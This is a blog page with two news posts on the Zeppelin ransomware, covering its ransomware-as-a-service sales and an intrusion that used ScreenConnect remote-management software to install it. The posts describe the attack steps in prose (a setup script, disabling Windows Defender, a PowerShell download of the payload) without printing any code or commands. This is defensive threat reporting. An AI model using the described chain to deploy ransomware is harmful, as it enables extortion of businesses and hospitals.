Search This Blog

Powered by Blogger.

Blog Archive

Labels

Showing posts with label Zeppelin. Show all posts

Zeppelin Ransomware have Resumed their Operations After a Temporary Pause

 

According to BleepingComputer, the operators behind the Zeppelin ransomware-as-a-service (RaaS), aka Buran, have resumed operations following a brief outage. Zeppelin's operators, unlike other ransomware, do not steal data from victims or maintain a leak site. 

Experts from BlackBerry Cylance discovered a new version of the Vega RaaS, called Zeppelin, and it first appeared on the threat landscape in November 2019. In Europe, the United States, and Canada, the latest version was used in attacks against technology and healthcare firms. Zeppelin was discovered in November and was spread via a watering hole attack in which the PowerShell payloads were hosted on the Pastebin website. 

The Zeppelin ransomware does not infect users in Russia or other ex-USSR countries like Ukraine, Belorussia, or Kazakhstan, unlike other Vega ransomware variants. The ransomware enumerates files on all drives and network shares and attempts to encrypt them after being executed. Experts found that the encryption algorithm used is the same as that used by other Vega variants. 

“This is in contrast with the classic RaaS operations, where developers typically look for partners to breach into a victim network, to steal data, and deploy the file-encrypting malware. The two parties then split paid ransoms, with developers getting the smaller piece (up to 30%),” reported BleepingComputer. 

Advanced Intel (AdvIntel), threat detection and loss avoidance firm, discovered that the Zeppelin ransomware developers revised their operation in March. They announced a "big software upgrade" as well as a new round of sales. According to an intelligence survey, the new Zeppelin version costs $2,300 per core build, as per AdvIntel head of research Yelisey Boguslavskiy. 

Following the major update, Zeppelin's developers released a new version of the malware on April 27 that had few new features but improved the encryption's stability. They also promised that development on the malware would continue and that long-term users, known as "subscribers," would receive special care. 

“We continue to work. We provide individual conditions and a loyal approach for each subscriber, the conditions are negotiable. Write to us, and we will be able to agree on a mutually beneficial term of cooperation”, said Zeppelin ransomware. 

Zeppelin is one of the few ransomware operations on the market that does not use a pure RaaS model, and it is also one of the most common, with high-profile members of the cybercrime community recommending it.

Zeppelin Is Back! Ransomware Stealing Data Via Remote Management Software


Hackers are employing remote management software to steal data and exploit networks only to install “Zeppelin” ransomware on compromised devices.

Reportedly, “ConnectWise” is the name of the software that fabricates agents that are installed on target computers. Once the agent kicks off, the device appears on the ConnectWise Control Site management software.

"ConnectWise" is a remote management software generally employed by MSPs and IP professionals to acquire access and render support to remote devices.

The ransomware Zeppelin was recently per reports spread via “ScreenConnect” which is a desktop control tool basically in charge of remotely executing commands on a user’s device and managing it.

The ScreenConnect client was installed on a compromised station leading to a massive real estate company’s network being jeopardized.

The client that is named, ScreenConnect.ClientService.exe would run in the background undetected waiting all the while for a “remote management connection”.

The software was then used to execute numerous commands that harvest data from back-up systems and install malware, Trojans capable of stealing data, other exploitation tools to make the network more vulnerable and finally the Zeppelin ransomware to infect machines.

The attack starts with the execution of the CMD script that readies the device for the ransomware installation. A “registry file” is installed which “configures the public encryption key”, which is then used by the ransomware to disable Windows defender by deactivating several security mechanisms.

Per reports, the hacker would execute a PowerShell command that downloads the Zeppelin ransomware in form of a file by the name of “oxfordnew.exe or oxford.exe on the C drive of Windows in the “Temp folder” section.

In most cases, such ransomware attacks are employed by firstly hacking the MSP and then configuring the remote management software to wreak havoc.

Instead, here, the hackers themselves deployed the ScreenConnect software only to have complete control over the situation and making as much trouble as possible.

Ransomware is being used at high rates where repeated incidents of stealing data are coming in light. The hackers use the stolen data as a weight to get people to pay in exchange for it.

Zeppelin, Maze, and REvil are leading names in the ransomware market.